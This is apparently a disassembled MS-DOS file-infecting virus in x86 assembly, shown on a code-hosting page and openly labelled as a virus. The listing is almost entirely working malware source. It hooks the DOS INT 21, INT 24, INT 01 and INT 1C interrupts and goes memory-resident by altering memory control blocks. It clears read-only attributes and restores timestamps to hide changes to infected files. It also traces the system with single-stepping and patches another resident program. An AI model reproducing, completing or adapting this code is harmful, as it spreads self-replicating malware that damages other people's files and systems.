MOV AX,3300 ;GET EXT CTRL-BREAK
CALL C2_INT21 ;P361
MOV BYTE PTR [CTRL_FLAG],DL ;SAVE OLD SETTING
MOV AX,3301 ;SET CTRL-BREAK
XOR DL,DL ;OFF
CALL C2_INT21
MOV AX,3524 ;GET INT 24
CALL C2_INT21 ;VECTORS
MOV WORD PTR [OLD_INT24_SEG],ES ;SAVE THEM HERE
MOV WORD PTR [OLD_INT24_OFS],BX ;
MOV DX,OFFSET VIR_INT24 ;J384
MOV AX,2524 ;SET INT 24
CALL C2_INT21 ;TO OUR HANDLER
MOV AX,4300 ;GET THE FILE ATTRIBUTES
PUSH DS ;
LDS DX,[BP+04] ;PTR TO FILENAME
CALL C2_INT21 ;
POP DS ;
JB GET_OUT_F_CL ;PROB_CH
MOV BYTE PTR [F_ATTR],CL ;
TEST CL,01 ;TEST FOR R_W
JZ NOCHANGE_ATTR ; ITS R_W IF EQUAL
MOV AX,4301 ;CHANGE F_ATTR
push ds
XOR CX,CX ;
LDS DX,[BP+04] ;
CALL C2_INT21 ;
POP DS ;
PROB_CH:
JB GET_OUT_F_CL ;
NOCHANGE_ATTR:
MOV AX,3D02 ;OPEN FILE R_W
PUSH DS ;
LDS DX,[BP+04] ;FNAME PTR
CALL C2_INT21
POP DS
JB J0780
;J74C
MOV WORD PTR [F_HANDLE],AX ;
MOV AX,5700 ;GET FILE TIME DATE
CALL I21_F_HANDLE ;
MOV WORD PTR [F_TIME],CX
MOV WORD PTR [F_DATE],DX
POP AX
POP BX
POP CX
POP DX
POP ES
POP BP
CLC
RET
OPEN_FILE ENDP ;764
CLOSE_F PROC
PUSH BP
MOV BP,SP
PUSH ES
PUSH DX
PUSH CX
PUSH BX
PUSH AX
MOV CX,WORD PTR [F_TIME] ; RESTORE
MOV DX,WORD PTR [F_DATE] ; TIME AND DATE
MOV AX,5701 ; TO FILE
CALL I21_F_HANDLE
MOV AH,3E
CALL I21_F_HANDLE ;******************
J0780: MOV CL,BYTE PTR [F_ATTR]
XOR CL,20
AND CL,3F
TEST CL,21
JZ GET_OUT_F_CL ;J7A0
MOV AX,4301
PUSH DS
XOR CH,CH
MOV CL,BYTE PTR [F_ATTR]
LDS DX,[BP+04] ;ASCIZ FILENAME
CALL C2_INT21 ;J361*************
POP DS
GET_OUT_F_CL:
MOV AX,2524
PUSH DS
LDS DX,DWORD PTR [OLD_INT24_OFS]
CALL C2_INT21
POP DS
MOV DL,BYTE PTR [CTRL_FLAG]
MOV AX,3301
CALL C2_INT21
POP AX
POP BX
POP CX
POP DX
POP ES
POP BP
STC
RET
CLOSE_F ENDP
RET_HOST PROC
POP CX
MOV DX,0200
CMP BYTE PTR CS:[BX+REM2],00
JE J7CC
MOV DH,03
J7CC: PUSH DX
PUSH CS
PUSH CX
INC BX
IRET
RET_HOST ENDP
;07d1
START:
CALL FIND_OFFSET
FIND_OFFSET:
POP BX
SUB BX,OFFSET FIND_OFFSET
MOV BYTE PTR CS:[BX+INFEC_FL],0FF ;D005C
CLD
CMP BYTE PTR CS:[BX+COMFILE],00
JE EXEFILE ;J800
;ONLY OCCURS IF IT IS A COM FILE
MOV SI,OFFSET TOP_HOST ;MOV 20H BYTES FROM
ADD SI,BX ; [SI] TO
MOV DI,0100 ; [DI]
MOV CX,0020 ;
REPZ MOVSB
PUSH CS
PUSH WORD PTR CS:[BX+HOST_IP]
PUSH ES
PUSH DS
PUSH AX
JMP short INSTALLED?
EXEFILE:
;NOTICE NO BX+ OFFSET NEEDED BECAUSE IT ASSUMES IT IS EXE AT THIS
;MOMENT
MOV DX,DS
ADD DX,+10
ADD DX,WORD PTR CS:[I_CS]
PUSH DX
PUSH word ptr cs:[I_IP]
PUSH ES
PUSH DS
PUSH AX
INSTALLED?:
PUSH BX
MOV BX,002C
CLC
MOV AX,0C603
INT 21
POP BX
JNB NOT_INSTALLED ;J0827
EXIT:
POP AX
POP DS
POP ES
CALL RET_HOST ;P_07BE
RETF
;J0827
NOT_INSTALLED:
CMP BYTE PTR cs:[BX+COMFILE],00
JE FILE_IS_EXE ;J0834
CMP SP,-10
JB EXIT ;J0820
FILE_IS_EXE:
MOV AX,DS ;LOOK AT MCB
DEC AX ;
MOV ES,AX ;
CMP BYTE PTR ES:[0000],5A ; IS IT Z
JE LAST_MEM_BLOCK ;YES IT IS LAST ONE
PUSH BX
MOV AH,48 ;REQUEST A BLOCK OF MEM
MOV BX,0FFFF ;LARGEST AVAILABLE
INT 21
CMP BX,00BC ;IS BLOCK > BC
JB TO_SMALL ;J0853
MOV AH,48 ;AVAIBLE BLOCK IS BIG ENOUGH
INT 21 ; GET IT IN AX
TO_SMALL:
POP BX
JB EXIT
DEC AX ;GET MCB SEGMENT IN ES
MOV ES,AX ;
CLI
MOV WORD PTR ES:[0001],0000 ;MARK THIS BLOCK AS FREE
CMP BYTE PTR ES:[0000],5A ; IS LAST MCB
JNE EXIT
ADD AX,WORD PTR ES:[0003] ;SIZE OF MEM MCB CONTROLS
INC AX ;
MOV WORD PTR ES:[0012],AX ;0012 PTS TO NEXT MCB
LAST_MEM_BLOCK:
MOV AX,WORD PTR ES:[0003] ;SIZE OF MEM
SUB AX,00BC ;MINUS SIZE VIRUS/10H
JB EXIT ;
MOV WORD PTR ES:[0003],AX
SUB WORD PTR ES:[0012],00BC
MOV ES,ES:[0012] ;SEG TO LOAD VIRUS INTO
XOR DI,DI ;MOV B40 BYTES FROM
MOV SI,BX ; DS:[SI]
; TO ES:[DI]
MOV CX,OFFSET VGROUP:BOT_VIR ;0B40
DB 0F3, 2E,0A4
; REPZ CS: MOVSB ;
PUSH ES
POP DS
PUSH BX
;J0899
;NOTE THAT DS:= ES MEANS LOCATION IN HIGH MEM BELOW 640
;SO THAT IF CS IS REFRENCED YOU MUST STILL USE OFFSET
;BUT IF DS IS USED OFFSET CAN NOT BE USED
MOV AX,3521
INT 21
MOV [OLD_INT21_SEG],ES
MOV [OLD_INT21_OFS],BX
MOV [OLD_INT21_SEG2],ES
MOV [OLD_INT21_OFS2],BX
MOV AX,3501 ;GET VECTOR FOR
INT 21 ;INTERUPT 01
MOV SI,BX ;SAVE IN REGS
MOV DI,ES ;DS:SI
MOV AX,351C
INT 21
MOV [OLD_INT1C_SEG],ES
MOV [OLD_INT1C_OFS],BX
POP BX
MOV AX,2521
MOV DX,OFFSET VIR_INT_21
INT 21
MOV AX,2501
MOV DX,OFFSET VIR_INT_01
INT 21
MOV DX,OFFSET VIR_INT_1C
PUSHF
MOV AX,BX ;PUT OFFSET IN AX
ADD AX,OFFSET VACSINE ;SET UP TO GO HERE
PUSH CS ;USING STACK
PUSH AX ;SAVE OFFSET
CLI ;CLEAR INTER FLAGS
PUSHF ;PUSH FLAGS
POP AX ;POP FLAG
OR AX,0100 ;SET TF
PUSH AX ;FOR SINGLE STEP
MOV AX,BX
ADD AX,OFFSET REAL_INT21 ;FLAGS SET FOR SINGLE STEP
PUSH CS ;CS
PUSH AX ;IP TO REAL_INT21
MOV AX,251C ;WHEN INT 21 CALLED
;HOOK 1C
MOV BYTE PTR [SNARE],01
IRET
VIR_INT_01 PROC
PUSH BP
MOV BP,SP
CMP BYTE PTR CS:[SNARE],01 ;IF SNARE IS SET
JE YES_NO ;CONTINUE
EXIT_VIR_INT01:
AND WORD PTR [BP+06],0FEFF ;CLEAR TF
MOV BYTE PTR cs:[SNARE],00 ;CLEAR SNARE
POP BP ;
IRET ;
YES_NO: CMP WORD PTR [BP+04],0300 ;
JB GOT_IT ;J0918
POP BP ;NOPE
IRET ;TRY AGAIN
GOT_IT:
PUSH BX
MOV BX,[BP+02]
MOV WORD PTR CS:[OLD_INT21_OFS2],BX
MOV BX,[BP+04]
MOV WORD PTR CS:[OLD_INT21_SEG2],BX
POP BX
JMP EXIT_VIR_INT01
VIR_INT_01 ENDP
VACSINE:
MOV BYTE PTR [SNARE],00
MOV AX,2501 ;RESTORE
MOV DX,SI ;INT 01
MOV DS,DI ;
INT 21 ;
;NEXT PIECE OF CODE IS LOOKING AT DS:=0000
;0000:00C5 MIGHT BE A JUMP TO AN INT BEING ALTERED AT TABLE
;0000:00C7
;0000:0413 MEM SIZE IN KILOBYTES
XOR AX,AX
MOV DS,AX
MOV WORD PTR DS:[00C5],397F
MOV BYTE PTR DS:[00C7],2C
MOV AX,WORD PTR DS:[MEM_SIZE]
MOV CL,06
SHL AX,CL
MOV DS,AX
MOV SI,012E
XOR AX,AX
MOV CX,0061
L1: ADD AX,[SI]
ADD SI,+02
LOOP L1
CMP AX,053BH
JE PING_IN_MEM ;J0969
JMP EXIT ;J0820
PING_IN_MEM:
CLI
MOV BYTE PTR DS:[017AH],01H
MOV BYTE PTR DS:[01FBH],01H
MOV BYTE PTR DS:[0093H],0E9H
MOV WORD PTR DS:[0094H],0341H
PUSH DS
POP ES
PUSH CS
POP DS
MOV SI,BX ;STILL = OFFSET
ADD SI,OFFSET NEW_PONG
MOV DI,03D7
MOV CX,0027
REPZ MOVSB
STI
JMP EXIT
P_0995 PROC
;CALLED BY P_09C8
;
PUSH BP
MOV BP,SP
PUSH CX
MOV AX,8000
XOR CX,CX
PLOOP:
TEST AX,[BP+08]
JNE J09A8
INC CX
SHR AX,1
JMP short PLOOP
J09A8:
XOR AX,[BP+08]
JE J09BC
MOV AX,[BP+04]
ADD AX,[BP+08]
ADD AX,CX
SUB AX,0011
CLC
POP CX
POP BP
RET
J09BC:
MOV AX,000F
SUB AX,CX
ADD AX,[BP+06]
STC
POP CX
POP BP
RET
P_0995 ENDP
;********************************************************************
P_09C8 PROC
;CALLED BY P_02D8
PUSH BP
MOV BP,SP
SUB SP,+10 ;ADD BACK SP 5 WORDS
MOV DX,8000
L21: TEST DX,[BP+08]
JNZ J09DA
SHR DX,1
JMP L21
J09DA:
LEA DI,[BP-10] ;
MOV CX,0008 ;
XOR AX,AX ;
PUSH SS ;SS = ES
POP ES ;
REPZ STOSW ;MOV 8 WORDS FROM
;MOV DS:SI
;TO ES:DI
MOV CX,[BP+08]
J09E9: TEST CX,DX
JE J0A4B
PUSH CX
PUSH [BP+06]
PUSH [BP+04]
CALL P_0995
MOV ES,AX
LAHF
ADD SP,+06
SAHF
JB J0A3A
;0A00
MOV AX,WORD PTR ES:[0000] ;
XOR [BP-10],AX ;
;
MOV AX,WORD PTR ES:[0002] ;
XOR [BP-0E],AX ;
;
MOV AX,WORD PTR ES:[0004] ;
XOR [BP-0C],AX ;
;
MOV AX,WORD PTR ES:[0006] ;
XOR [BP-0A],AX ;
;
MOV AX,WORD PTR ES:[0008] ;
XOR [BP-08],AX ;
;
MOV AX,WORD PTR ES:[000A] ;
XOR [BP-06],AX ;
;
MOV AX,WORD PTR ES:[000C] ;
XOR [BP-04],AX ;
;
MOV AX,WORD PTR ES:[000E] ;
XOR [BP-02],AX ;
;
JMP SHORT J0A4B
J0A3A:
MOV AX,CX
MOV CX,0008
LEA SI,[BP-10]
XOR DI,DI
DB 0F3,36,0A5
; REPZ SS:MOVSW
MOV CX,AX
JMP SHORT J0A4E
J0A4B:
DEC CX
JMP SHORT J09E9
J0A4E:
SHR DX,1
JB J0A54
JMP SHORT J09DA
J0A54:
MOV SP,BP
POP BP
RET
P_09C8 ENDP
;*****************************************************************
P_0A58 PROC
PUSH BP
MOV BP,SP
PUSH DS
J0A5C:
MOV DS,[BP+04]
MOV ES,[BP+06]
XOR BX,BX
J0A64:
MOV AX,WORD PTR ES:[BX]
XOR WORD PTR [BX],AX
ADD BX,+02
CMP BX,+10
JB J0A64
INC WORD PTR [BP+04]
INC WORD PTR [BP+06]
DEC WORD PTR [BP+08]
JNZ J0A5C
POP DS
POP BP
RET
P_0A58 ENDP
;************************************************************
P_0A7F PROC
PUSH BP
MOV BP,SP
PUSH DS
MOV BL,01
J0A85:
XOR SI,SI
J0A87:
XOR CX,CX
MOV DI,[BP+08]
ADD DI,[BP+0A]
DEC DI
J0A90:
MOV DS,DI
SHR BYTE PTR [SI],1
RCL CX,1
DEC DI
CMP DI,[BP+08]
JNB J0A90
OR CX,CX
JZ J0AB1
PUSH CX
PUSH [BP+06]
PUSH [BP+04]
CALL P_0995
ADD SP,+06 ;
MOV DS,AX
XOR BYTE PTR [SI],BL
J0AB1:
INC SI
CMP SI,+10
JB J0A87
SHL BL,01
JNB J0A85
POP DS
POP BP
RET
P_0A7F ENDP
J0ABE DB 87,0DBH
;J0AC0 DB 88,CB ;VALUE MAYBE USED AS 0ACO
J0AC0: DB 88,0CBH,8A,99,8F,38
DB 0E7H,0CDH,0A1H,9BH,3EH
DB 0EF,86,0C8,97,83,52
DB 34,0BE,8C,21, 29,0B1
DB 0F9H,0C1H,9BH,12H,04H,09H,0F3H
DB 45, 01, 93, 01DH, 0B0
DB 0B9,0C6,01,06,92,37,50
DB 49,0E8,0D5,71,97
DB 22,0A6,0E6,04C,50
DB 0BE,2A,23
DB 0BE,44, 01DH
DB 0A1,0A6,6BH
DB 0A0,0E0,06
DB 0AA,1A,0F6,2A,0C0
DB 02,2F,75,99
DB 06H,0FH,5BH,97H,02H,3EH
DB 64, 07DH, 0C8,50,66,08
DB 0C4,0FA,92,8E,64,75
DB 1BH, 0A6H, 1BH, 0B9H, 32H, 0BDH
DB 0BH, 3EH, 61H, 06DH, 0E0H, 0C4H
DB 0B9H, 29, 0CAH, 9CH, 17H, 08H, 21H
DB 0EAH, 0EEH, 7EH , 85H, 0B1H
DB 63H, 2AH, 0C3H, 71H, 71H, 2CH, 0A0H
DB 0F2H, 8BH, 59H, 0DH
DB 0F9,0D5H, 00H
;POSSIBLE END OF VIRUS
BOT_VIR EQU $ ;LABEL FOR END OF VIRUS
VIRUS_CODE ENDS
END start
View Git Blame Copy Permalink